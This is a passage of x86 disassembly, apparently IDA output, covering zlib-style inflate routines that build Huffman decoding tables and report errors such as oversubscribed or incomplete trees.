mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp short loc_42C3C9
; ---------------------------------------------------------------------------
loc_42C365: ; CODE XREF: sub_42B09D+6C�j
mov [ebp+arg_8], 0FFFFFFFEh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp short loc_42C3C9
; ---------------------------------------------------------------------------
loc_42C3C4: ; CODE XREF: sub_42B09D:loc_42B3A1�j
; sub_42B09D+487�j ...
jmp loc_42B0FD
; ---------------------------------------------------------------------------
loc_42C3C9: ; CODE XREF: sub_42B09D+EB�j
; sub_42B09D+238�j ...
mov esp, ebp
pop ebp
retn
sub_42B09D endp
; ---------------------------------------------------------------------------
off_42C3CD dd offset loc_42B119 ; DATA XREF: sub_42B09D+75�r
dd offset loc_42B3A6
dd offset loc_42B529
dd offset loc_42B78E
dd offset loc_42B99D
dd offset loc_42BBAE
dd offset loc_42C0CF
dd offset loc_42C1DB
dd offset loc_42C2A4
dd offset loc_42C306
off_42C3F5 dd offset loc_42B1F4 ; DATA XREF: sub_42B09D+150�r
dd offset loc_42B231
dd offset loc_42B2FA
dd offset loc_42B31A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C405 proc near ; CODE XREF: sub_42DB7C+3C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42AEEE
add esp, 0Ch
mov edx, [ebp+arg_0]
mov eax, [edx+28h]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_4]
call dword ptr [eax+24h]
add esp, 8
mov ecx, [ebp+arg_0]
mov edx, [ecx+24h]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_4]
call dword ptr [edx+24h]
add esp, 8
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_4]
call dword ptr [eax+24h]
add esp, 8
xor eax, eax
pop ebp
retn
sub_42C405 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C460 proc near ; CODE XREF: sub_42CD2E+51�p
; sub_42CDD6+62�p ...
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = byte ptr -0D8h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 108h
lea eax, [ebp+var_54]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx], 0
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx], 0
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx], 0
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx], 0
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+var_4]
mov dword ptr [eax], 0
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov dword ptr [edx], 0
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ecx], 0
mov edx, [ebp+var_4]
add edx, 4
mov [ebp+var_4], edx
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_EC], ecx
loc_42C59E: ; CODE XREF: sub_42C460+172�j
mov edx, [ebp+var_4]
mov eax, [edx]
mov ecx, [ebp+eax*4+var_54]
add ecx, 1
mov edx, [ebp+var_4]
mov eax, [edx]
mov [ebp+eax*4+var_54], ecx
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
mov edx, [ebp+var_EC]
sub edx, 1
mov [ebp+var_EC], edx
cmp [ebp+var_EC], 0
jnz short loc_42C59E
mov eax, [ebp+var_54]
cmp eax, [ebp+arg_4]
jnz short loc_42C5F5
mov ecx, [ebp+arg_14]
mov dword ptr [ecx], 0
mov edx, [ebp+arg_18]
mov dword ptr [edx], 0
xor eax, eax
jmp loc_42CD2A
; ---------------------------------------------------------------------------
loc_42C5F5: ; CODE XREF: sub_42C460+17A�j
mov eax, [ebp+arg_18]
mov ecx, [eax]
mov [ebp+var_100], ecx
mov [ebp+var_F4], 1
jmp short loc_42C61B
; ---------------------------------------------------------------------------
loc_42C60C: ; CODE XREF: sub_42C460:loc_42C633�j
mov edx, [ebp+var_F4]
add edx, 1
mov [ebp+var_F4], edx
loc_42C61B: ; CODE XREF: sub_42C460+1AA�j
cmp [ebp+var_F4], 0Fh
ja short loc_42C635
mov eax, [ebp+var_F4]
cmp [ebp+eax*4+var_54], 0
jz short loc_42C633
jmp short loc_42C635
; ---------------------------------------------------------------------------
loc_42C633: ; CODE XREF: sub_42C460+1CF�j
jmp short loc_42C60C
; ---------------------------------------------------------------------------
loc_42C635: ; CODE XREF: sub_42C460+1C2�j
; sub_42C460+1D1�j
mov ecx, [ebp+var_F4]
mov [ebp+var_FC], ecx
mov edx, [ebp+var_100]
cmp edx, [ebp+var_F4]
jnb short loc_42C65B
mov eax, [ebp+var_F4]
mov [ebp+var_100], eax
loc_42C65B: ; CODE XREF: sub_42C460+1ED�j
mov [ebp+var_EC], 0Fh
jmp short loc_42C676
; ---------------------------------------------------------------------------
loc_42C667: ; CODE XREF: sub_42C460:loc_42C68E�j
mov ecx, [ebp+var_EC]
sub ecx, 1
mov [ebp+var_EC], ecx
loc_42C676: ; CODE XREF: sub_42C460+205�j
cmp [ebp+var_EC], 0
jz short loc_42C690
mov edx, [ebp+var_EC]
cmp [ebp+edx*4+var_54], 0
jz short loc_42C68E
jmp short loc_42C690
; ---------------------------------------------------------------------------
loc_42C68E: ; CODE XREF: sub_42C460+22A�j
jmp short loc_42C667
; ---------------------------------------------------------------------------
loc_42C690: ; CODE XREF: sub_42C460+21D�j
; sub_42C460+22C�j
mov eax, [ebp+var_EC]
mov [ebp+var_A0], eax
mov ecx, [ebp+var_100]
cmp ecx, [ebp+var_EC]
jbe short loc_42C6B6
mov edx, [ebp+var_EC]
mov [ebp+var_100], edx
loc_42C6B6: ; CODE XREF: sub_42C460+248�j
mov eax, [ebp+arg_18]
mov ecx, [ebp+var_100]
mov [eax], ecx
mov edx, 1
mov ecx, [ebp+var_F4]
shl edx, cl
mov [ebp+var_E8], edx
jmp short loc_42C6F3
; ---------------------------------------------------------------------------
loc_42C6D6: ; CODE XREF: sub_42C460:loc_42C72A�j
mov eax, [ebp+var_F4]
add eax, 1
mov [ebp+var_F4], eax
mov ecx, [ebp+var_E8]
shl ecx, 1
mov [ebp+var_E8], ecx
loc_42C6F3: ; CODE XREF: sub_42C460+274�j
mov edx, [ebp+var_F4]
cmp edx, [ebp+var_EC]
jnb short loc_42C72C
mov eax, [ebp+var_F4]
mov ecx, [ebp+var_E8]
sub ecx, [ebp+eax*4+var_54]
mov [ebp+var_E8], ecx
cmp [ebp+var_E8], 0
jge short loc_42C72A
mov eax, 0FFFFFFFDh
jmp loc_42CD2A
; ---------------------------------------------------------------------------
loc_42C72A: ; CODE XREF: sub_42C460+2BE�j
jmp short loc_42C6D6
; ---------------------------------------------------------------------------
loc_42C72C: ; CODE XREF: sub_42C460+29F�j
mov edx, [ebp+var_EC]
mov eax, [ebp+var_E8]
sub eax, [ebp+edx*4+var_54]
mov [ebp+var_E8], eax
cmp [ebp+var_E8], 0
jge short loc_42C755
mov eax, 0FFFFFFFDh
jmp loc_42CD2A
; ---------------------------------------------------------------------------
loc_42C755: ; CODE XREF: sub_42C460+2E9�j
mov ecx, [ebp+var_EC]
mov edx, [ebp+ecx*4+var_54]
add edx, [ebp+var_E8]
mov eax, [ebp+var_EC]
mov [ebp+eax*4+var_54], edx
mov [ebp+var_F4], 0
mov ecx, [ebp+var_F4]
mov [ebp+var_DC], ecx
lea edx, [ebp+var_50]
mov [ebp+var_4], edx
lea eax, [ebp+var_D8]
mov [ebp+var_98], eax
loc_42C797: ; CODE XREF: sub_42C460+386�j
mov ecx, [ebp+var_EC]
sub ecx, 1
mov [ebp+var_EC], ecx
cmp [ebp+var_EC], 0
jz short loc_42C7E8
mov edx, [ebp+var_4]
mov eax, [ebp+var_F4]
add eax, [edx]
mov [ebp+var_F4], eax
mov ecx, [ebp+var_98]
mov edx, [ebp+var_F4]
mov [ecx], edx
mov eax, [ebp+var_98]
add eax, 4
mov [ebp+var_98], eax
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
jmp short loc_42C797
; ---------------------------------------------------------------------------
loc_42C7E8: ; CODE XREF: sub_42C460+34D�j
mov edx, [ebp+arg_0]
mov [ebp+var_4], edx
mov [ebp+var_EC], 0
loc_42C7F8: ; CODE XREF: sub_42C460+404�j
mov eax, [ebp+var_4]
mov ecx, [eax]
mov [ebp+var_F4], ecx
mov edx, [ebp+var_F4]
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
test edx, edx
jz short loc_42C84C
mov ecx, [ebp+var_F4]
mov edx, [ebp+ecx*4+var_E0]
mov eax, [ebp+arg_24]
mov ecx, [ebp+var_EC]
mov [eax+edx*4], ecx
mov edx, [ebp+var_F4]
mov eax, [ebp+edx*4+var_E0]
add eax, 1
mov ecx, [ebp+var_F4]
mov [ebp+ecx*4+var_E0], eax
loc_42C84C: ; CODE XREF: sub_42C460+3B4�j
mov edx, [ebp+var_EC]
add edx, 1
mov [ebp+var_EC], edx
mov eax, [ebp+var_EC]
cmp eax, [ebp+arg_4]
jb short loc_42C7F8
mov ecx, [ebp+var_A0]
mov edx, [ebp+ecx*4+var_E0]
mov [ebp+arg_4], edx
mov [ebp+var_EC], 0
mov eax, [ebp+var_EC]
mov [ebp+var_E0], eax
mov ecx, [ebp+arg_24]
mov [ebp+var_4], ecx
mov [ebp+var_E4], 0FFFFFFFFh
mov edx, [ebp+var_100]
neg edx
mov [ebp+var_9C], edx
mov [ebp+var_90], 0
mov [ebp+var_8], 0
mov [ebp+var_F0], 0
jmp short loc_42C8D6
; ---------------------------------------------------------------------------
loc_42C8C7: ; CODE XREF: sub_42C460:loc_42CCF7�j
mov eax, [ebp+var_FC]
add eax, 1
mov [ebp+var_FC], eax
loc_42C8D6: ; CODE XREF: sub_42C460+465�j
mov ecx, [ebp+var_FC]
cmp ecx, [ebp+var_A0]
jg loc_42CCFC
mov edx, [ebp+var_FC]
mov eax, [ebp+edx*4+var_54]
mov [ebp+var_C], eax
loc_42C8F5: ; CODE XREF: sub_42C460:loc_42CCF2�j
mov ecx, [ebp+var_C]
mov edx, [ebp+var_C]
sub edx, 1
mov [ebp+var_C], edx
test ecx, ecx
jz loc_42CCF7
loc_42C909: ; CODE XREF: sub_42C460:loc_42CB3F�j
mov eax, [ebp+var_9C]
add eax, [ebp+var_100]
cmp [ebp+var_FC], eax
jle loc_42CB44
mov ecx, [ebp+var_E4]
add ecx, 1
mov [ebp+var_E4], ecx
mov edx, [ebp+var_9C]
add edx, [ebp+var_100]
mov [ebp+var_9C], edx
mov eax, [ebp+var_A0]
sub eax, [ebp+var_9C]
mov [ebp+var_F0], eax
mov ecx, [ebp+var_F0]
cmp ecx, [ebp+var_100]
jbe short loc_42C970
mov edx, [ebp+var_100]
mov [ebp+var_104], edx
jmp short loc_42C97C
; ---------------------------------------------------------------------------
loc_42C970: ; CODE XREF: sub_42C460+500�j
mov eax, [ebp+var_F0]
mov [ebp+var_104], eax
loc_42C97C: ; CODE XREF: sub_42C460+50E�j
mov ecx, [ebp+var_104]
mov [ebp+var_F0], ecx
mov edx, [ebp+var_FC]
sub edx, [ebp+var_9C]
mov [ebp+var_F4], edx
mov eax, 1
mov ecx, [ebp+var_F4]
shl eax, cl
mov [ebp+var_94], eax
mov ecx, [ebp+var_C]
add ecx, 1
cmp [ebp+var_94], ecx
jbe loc_42CA53
mov edx, [ebp+var_C]
add edx, 1
mov eax, [ebp+var_94]
sub eax, edx
mov [ebp+var_94], eax
mov ecx, [ebp+var_FC]
lea edx, [ebp+ecx*4+var_54]
mov [ebp+var_98], edx
mov eax, [ebp+var_F4]
cmp eax, [ebp+var_F0]
jnb short loc_42CA53
loc_42C9F1: ; CODE XREF: sub_42C460+5F1�j
mov ecx, [ebp+var_F4]
add ecx, 1
mov [ebp+var_F4], ecx
mov edx, [ebp+var_F4]
cmp edx, [ebp+var_F0]
jnb short loc_42CA53
mov eax, [ebp+var_94]
shl eax, 1
mov [ebp+var_94], eax
mov ecx, [ebp+var_98]
add ecx, 4
mov [ebp+var_98], ecx
mov edx, [ebp+var_98]
mov eax, [ebp+var_94]
cmp eax, [edx]
ja short loc_42CA3D
jmp short loc_42CA53
; ---------------------------------------------------------------------------
loc_42CA3D: ; CODE XREF: sub_42C460+5D9�j
mov ecx, [ebp+var_98]
mov edx, [ebp+var_94]
sub edx, [ecx]
mov [ebp+var_94], edx
jmp short loc_42C9F1
; ---------------------------------------------------------------------------
loc_42CA53: ; CODE XREF: sub_42C460+559�j
; sub_42C460+58F�j ...
mov eax, 1
mov ecx, [ebp+var_F4]
shl eax, cl
mov [ebp+var_F0], eax
mov ecx, [ebp+arg_20]
mov edx, [ecx]
add edx, [ebp+var_F0]
cmp edx, 5A0h
jbe short loc_42CA83
mov eax, 0FFFFFFFCh
jmp loc_42CD2A
; ---------------------------------------------------------------------------
loc_42CA83: ; CODE XREF: sub_42C460+617�j
mov eax, [ebp+arg_20]
mov ecx, [eax]
mov edx, [ebp+arg_1C]
lea eax, [edx+ecx*8]
mov [ebp+var_8], eax
mov ecx, [ebp+var_E4]
mov edx, [ebp+var_8]
mov [ebp+ecx*4+var_90], edx
mov eax, [ebp+arg_20]
mov ecx, [eax]
add ecx, [ebp+var_F0]
mov edx, [ebp+arg_20]
mov [edx], ecx
cmp [ebp+var_E4], 0
jz short loc_42CB37
mov eax, [ebp+var_E4]
mov ecx, [ebp+var_EC]
mov [ebp+eax*4+var_E0], ecx
mov dl, byte ptr [ebp+var_100]
mov byte ptr [ebp+var_14+1], dl
mov al, byte ptr [ebp+var_F4]
mov byte ptr [ebp+var_14], al
mov ecx, [ebp+var_9C]
sub ecx, [ebp+var_100]
mov edx, [ebp+var_EC]
shr edx, cl
mov [ebp+var_F4], edx
mov eax, [ebp+var_E4]
mov ecx, [ebp+var_8]
sub ecx, [ebp+eax*4+var_94]
sar ecx, 3
sub ecx, [ebp+var_F4]
mov [ebp+var_10], ecx
mov edx, [ebp+var_E4]
mov eax, [ebp+edx*4+var_94]
mov ecx, [ebp+var_F4]
mov edx, [ebp+var_14]
mov [eax+ecx*8], edx
mov edx, [ebp+var_10]
mov [eax+ecx*8+4], edx
jmp short loc_42CB3F
; ---------------------------------------------------------------------------
loc_42CB37: ; CODE XREF: sub_42C460+658�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_8]
mov [eax], ecx
loc_42CB3F: ; CODE XREF: sub_42C460+6D5�j
jmp loc_42C909
; ---------------------------------------------------------------------------
loc_42CB44: ; CODE XREF: sub_42C460+4BB�j
mov edx, [ebp+var_FC]
sub edx, [ebp+var_9C]
mov byte ptr [ebp+var_14+1], dl
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_24]
lea edx, [ecx+eax*4]
cmp [ebp+var_4], edx
jb short loc_42CB67
mov byte ptr [ebp+var_14], 0C0h
jmp short loc_42CBC5
; ---------------------------------------------------------------------------
loc_42CB67: ; CODE XREF: sub_42C460+6FF�j
mov eax, [ebp+var_4]
mov ecx, [eax]
cmp ecx, [ebp+arg_8]
jnb short loc_42CB97
mov edx, [ebp+var_4]
cmp dword ptr [edx], 100h
sbb eax, eax
and al, 0A0h
add eax, 60h
mov byte ptr [ebp+var_14], al
mov ecx, [ebp+var_4]
mov edx, [ecx]
mov [ebp+var_10], edx
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
jmp short loc_42CBC5
; ---------------------------------------------------------------------------
loc_42CB97: ; CODE XREF: sub_42C460+70F�j
mov ecx, [ebp+var_4]
mov edx, [ecx]
sub edx, [ebp+arg_8]
mov eax, [ebp+arg_10]
mov ecx, [eax+edx*4]
add ecx, 50h
mov byte ptr [ebp+var_14], cl
mov edx, [ebp+var_4]
mov eax, [edx]
sub eax, [ebp+arg_8]
mov ecx, [ebp+arg_C]
mov edx, [ecx+eax*4]
mov [ebp+var_10], edx
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
loc_42CBC5: ; CODE XREF: sub_42C460+705�j
; sub_42C460+735�j
mov ecx, [ebp+var_FC]
sub ecx, [ebp+var_9C]
mov edx, 1
shl edx, cl
mov [ebp+var_94], edx
mov eax, [ebp+var_EC]
mov ecx, [ebp+var_9C]
shr eax, cl
mov [ebp+var_F4], eax
jmp short loc_42CC06
; ---------------------------------------------------------------------------
loc_42CBF4: ; CODE XREF: sub_42C460+7CA�j
mov ecx, [ebp+var_F4]
add ecx, [ebp+var_94]
mov [ebp+var_F4], ecx
loc_42CC06: ; CODE XREF: sub_42C460+792�j
mov edx, [ebp+var_F4]
cmp edx, [ebp+var_F0]
jnb short loc_42CC2C
mov eax, [ebp+var_F4]
mov ecx, [ebp+var_8]
mov edx, [ebp+var_14]
mov [ecx+eax*8], edx
mov edx, [ebp+var_10]
mov [ecx+eax*8+4], edx
jmp short loc_42CBF4
; ---------------------------------------------------------------------------
loc_42CC2C: ; CODE XREF: sub_42C460+7B2�j
mov ecx, [ebp+var_FC]
sub ecx, 1
mov eax, 1
shl eax, cl
mov [ebp+var_F4], eax
jmp short loc_42CC52
; ---------------------------------------------------------------------------
loc_42CC44: ; CODE XREF: sub_42C460+814�j
mov ecx, [ebp+var_F4]
shr ecx, 1
mov [ebp+var_F4], ecx
loc_42CC52: ; CODE XREF: sub_42C460+7E2�j
mov edx, [ebp+var_EC]
and edx, [ebp+var_F4]
test edx, edx
jz short loc_42CC76
mov eax, [ebp+var_EC]
xor eax, [ebp+var_F4]
mov [ebp+var_EC], eax
jmp short loc_42CC44
; ---------------------------------------------------------------------------
loc_42CC76: ; CODE XREF: sub_42C460+800�j
mov ecx, [ebp+var_EC]
xor ecx, [ebp+var_F4]
mov [ebp+var_EC], ecx
mov edx, 1
mov ecx, [ebp+var_9C]
shl edx, cl
sub edx, 1
mov [ebp+var_F8], edx
loc_42CC9E: ; CODE XREF: sub_42C460+890�j
mov eax, [ebp+var_EC]
and eax, [ebp+var_F8]
mov ecx, [ebp+var_E4]
cmp eax, [ebp+ecx*4+var_E0]
jz short loc_42CCF2
mov edx, [ebp+var_E4]
sub edx, 1
mov [ebp+var_E4], edx
mov eax, [ebp+var_9C]
sub eax, [ebp+var_100]
mov [ebp+var_9C], eax
mov edx, 1
mov ecx, [ebp+var_9C]
shl edx, cl
sub edx, 1
mov [ebp+var_F8], edx
jmp short loc_42CC9E
; ---------------------------------------------------------------------------
loc_42CCF2: ; CODE XREF: sub_42C460+857�j
jmp loc_42C8F5
; ---------------------------------------------------------------------------
loc_42CCF7: ; CODE XREF: sub_42C460+4A3�j
jmp loc_42C8C7
; ---------------------------------------------------------------------------
loc_42CCFC: ; CODE XREF: sub_42C460+482�j
cmp [ebp+var_E8], 0
jz short loc_42CD1A
cmp [ebp+var_A0], 1
jz short loc_42CD1A
mov [ebp+var_108], 0FFFFFFFBh
jmp short loc_42CD24
; ---------------------------------------------------------------------------
loc_42CD1A: ; CODE XREF: sub_42C460+8A3�j
; sub_42C460+8AC�j
mov [ebp+var_108], 0
loc_42CD24: ; CODE XREF: sub_42C460+8B8�j
mov eax, [ebp+var_108]
loc_42CD2A: ; CODE XREF: sub_42C460+190�j
; sub_42C460+2C5�j ...
mov esp, ebp
pop ebp
retn
sub_42C460 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CD2E proc near ; CODE XREF: sub_42B09D+A62�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], 0
push 4
push 13h
mov eax, [ebp+arg_10]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_10]
call dword ptr [edx+20h]
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_42CD5F
mov eax, 0FFFFFFFCh
jmp short loc_42CDD2
; ---------------------------------------------------------------------------
loc_42CD5F: ; CODE XREF: sub_42CD2E+28�j
mov eax, [ebp+var_C]
push eax
lea ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_8]
push ecx
push 0
push 0
push 13h
push 13h
mov edx, [ebp+arg_0]
push edx
call sub_42C460
add esp, 28h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFDh
jnz short loc_42CD9C
mov eax, [ebp+arg_10]
mov dword ptr [eax+18h], offset aOversubscribed ; "oversubscribed dynamic bit lengths tree"...
jmp short loc_42CDBB
; ---------------------------------------------------------------------------
loc_42CD9C: ; CODE XREF: sub_42CD2E+60�j
cmp [ebp+var_4], 0FFFFFFFBh
jz short loc_42CDAA
mov ecx, [ebp+arg_4]
cmp dword ptr [ecx], 0
jnz short loc_42CDBB
loc_42CDAA: ; CODE XREF: sub_42CD2E+72�j
mov edx, [ebp+arg_10]
mov dword ptr [edx+18h], offset aIncompleteDyna ; "incomplete dynamic bit lengths tree"
mov [ebp+var_4], 0FFFFFFFDh
loc_42CDBB: ; CODE XREF: sub_42CD2E+6C�j
; sub_42CD2E+7A�j
mov eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_10]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_10]
call dword ptr [eax+24h]
add esp, 8
mov eax, [ebp+var_4]
loc_42CDD2: ; CODE XREF: sub_42CD2E+2F�j
mov esp, ebp
pop ebp
retn
sub_42CD2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42CDD6 proc near ; CODE XREF: sub_42B09D+F01�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], 0
push 4
push 120h
mov eax, [ebp+arg_20]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_20]
call dword ptr [edx+20h]
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_42CE0D
mov eax, 0FFFFFFFCh
jmp loc_42CF57
; ---------------------------------------------------------------------------
loc_42CE0D: ; CODE XREF: sub_42CDD6+2B�j
mov eax, [ebp+var_C]
push eax
lea ecx, [ebp+var_8]
push ecx
mov edx, [ebp+arg_1C]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_14]
push ecx
push offset dword_434548
push offset dword_4344CC
push 101h
mov edx, [ebp+arg_0]
push edx
mov eax, [ebp+arg_8]
push eax
call sub_42C460
add esp, 28h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_42CE51
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx], 0
jnz short loc_42CE96
loc_42CE51: ; CODE XREF: sub_42CDD6+71�j
cmp [ebp+var_4], 0FFFFFFFDh
jnz short loc_42CE63
mov edx, [ebp+arg_20]
mov dword ptr [edx+18h], offset aOversubscrib_0 ; "oversubscribed literal/length tree"
jmp short loc_42CE7A
; ---------------------------------------------------------------------------
loc_42CE63: ; CODE XREF: sub_42CDD6+7F�j
cmp [ebp+var_4], 0FFFFFFFCh
jz short loc_42CE7A
mov eax, [ebp+arg_20]
mov dword ptr [eax+18h], offset aIncompleteLite ; "incomplete literal/length tree"
mov [ebp+var_4], 0FFFFFFFDh
loc_42CE7A: ; CODE XREF: sub_42CDD6+8B�j
; sub_42CDD6+91�j
mov ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_20]
mov eax, [edx+28h]
push eax
mov ecx, [ebp+arg_20]
call dword ptr [ecx+24h]
add esp, 8
mov eax, [ebp+var_4]
jmp loc_42CF57
; ---------------------------------------------------------------------------
loc_42CE96: ; CODE XREF: sub_42CDD6+79�j
mov edx, [ebp+var_C]
push edx
lea eax, [ebp+var_8]
push eax
mov ecx, [ebp+arg_1C]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_18]
push eax
push offset dword_43463C
push offset dword_4345C4
push 0
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_8]
lea ecx, [eax+edx*4]
push ecx
call sub_42C460
add esp, 28h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_42CEE6
mov edx, [ebp+arg_10]
cmp dword ptr [edx], 0
jnz short loc_42CF41
cmp [ebp+arg_0], 101h
jbe short loc_42CF41
loc_42CEE6: ; CODE XREF: sub_42CDD6+FD�j
cmp [ebp+var_4], 0FFFFFFFDh
jnz short loc_42CEF8
mov eax, [ebp+arg_20]
mov dword ptr [eax+18h], offset aOversubscrib_1 ; "oversubscribed distance tree"
jmp short loc_42CF28
; ---------------------------------------------------------------------------
loc_42CEF8: ; CODE XREF: sub_42CDD6+114�j
cmp [ebp+var_4], 0FFFFFFFBh
jnz short loc_42CF11
mov ecx, [ebp+arg_20]
mov dword ptr [ecx+18h], offset aIncompleteDist ; "incomplete distance tree"
mov [ebp+var_4], 0FFFFFFFDh
jmp short loc_42CF28
; ---------------------------------------------------------------------------
loc_42CF11: ; CODE XREF: sub_42CDD6+126�j
cmp [ebp+var_4], 0FFFFFFFCh
jz short loc_42CF28
mov edx, [ebp+arg_20]
